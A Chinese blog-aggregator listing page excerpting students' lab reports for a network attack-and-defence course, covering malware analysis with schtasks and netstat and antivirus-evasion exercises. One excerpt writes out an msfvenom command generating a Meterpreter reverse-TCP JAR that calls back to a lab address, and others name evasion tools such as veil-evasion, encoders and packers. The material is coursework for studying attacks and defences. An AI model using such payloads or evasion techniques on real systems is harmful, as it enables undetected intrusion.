20155317《网络对抗》Exp4 恶意代码分析 基础问题回答 我首先会选择看任务管理器,查看系统下有什么进程,都在干些什么,不懂得就去网上搜索相关关键词。 我会开启360安全卫士,利用360监控是否有恶意程序。 2.如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息。 利 ...
分类:
其他好文 时间:
2018-04-12 00:15:17
阅读次数:
219
实验内容 使用Windows计划任务schtasks监控系统运行 使用指令 创建计划任务netstat 指令解释: TN:Task Name,本例中是netstat SC: SChedule type,本例中是MINUTE,以分钟来计时 MO: MOdifier TR: Task Run,要运行的指 ...
分类:
其他好文 时间:
2018-04-11 18:10:10
阅读次数:
206
20155331 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.基于特征码的检测,2.启发式恶意软件检测,3.基于行为的恶意软件检测。 免杀是做什么? 让病毒不被杀毒软件杀掉。 免杀的基本方法有哪些? 1.改变特征码 2.加壳 实践总结与体会 这次实验让我深入理解了免杀原 ...
分类:
其他好文 时间:
2018-04-11 16:00:36
阅读次数:
174
20155330 《网络攻防》 Exp3 免杀原理与实践 基础问题回答 1. 杀软是如何检测出恶意代码的? 1. 基于特征码。先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码。 2. 基于行为。杀软通过检测程序是否有更改注册表行为、是否有设置自启动、是否有 ...
分类:
其他好文 时间:
2018-04-11 00:22:02
阅读次数:
194
使用msf编码器生成jar包 使用指令:msfvenom p java/meterpreter/reverse_tcp lhost=192.168.157.141 lport=5234 x 5234_backjar.jar 上传扫描的结果: 结果还行 使用veil evasion生成反弹链接的可执行 ...
分类:
其他好文 时间:
2018-04-11 00:21:00
阅读次数:
158
20155324《网络对抗》免杀原理与实践 免杀原理 实验内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil evasion,自己利用shellcode编程等免杀工具或技巧; (3)通过组合应用各种技术实现恶意代码免杀 (4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明 ...
分类:
其他好文 时间:
2018-04-11 00:18:48
阅读次数:
185
2015306 白皎 《网络攻防》Exp4 恶意代码分析 netstat 【Mac、Linux、Win】 sysinteral 【MS】:1 2 3 一、系统 监控— —Windows计划任务schtasks 1.创建计划任务,使系统每5分钟自动检测到哪些有哪些程序在连接我们的网络。 注:任务将创建 ...
分类:
其他好文 时间:
2018-04-11 00:08:28
阅读次数:
206
20155305《网络对抗》恶意代码分析 实验过程 1、计划任务监控 在C盘根目录下建立一个 文件(先把后缀设为txt,保存好内容后记得把后缀改为bat),内容如下: 老师讲课后在课堂上就建立了这个windows批处理文件 文件的作用是将记录的联网结果按格式输出到相同目录下的 文件中。 用 指令创建 ...
分类:
其他好文 时间:
2018-04-11 00:03:44
阅读次数:
190
Exp3 免杀原理与实践 一、实践内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧; 2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要 ...
分类:
其他好文 时间:
2018-04-10 21:55:15
阅读次数:
481
20155302《网络对抗》Exp3 免杀原理与实践 实验要求 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分) 2.通过组合应用各种技术实现恶意代码免杀(1分) (如果成功实现了免杀的,简单 ...
分类:
其他好文 时间:
2018-04-10 19:45:29
阅读次数:
245
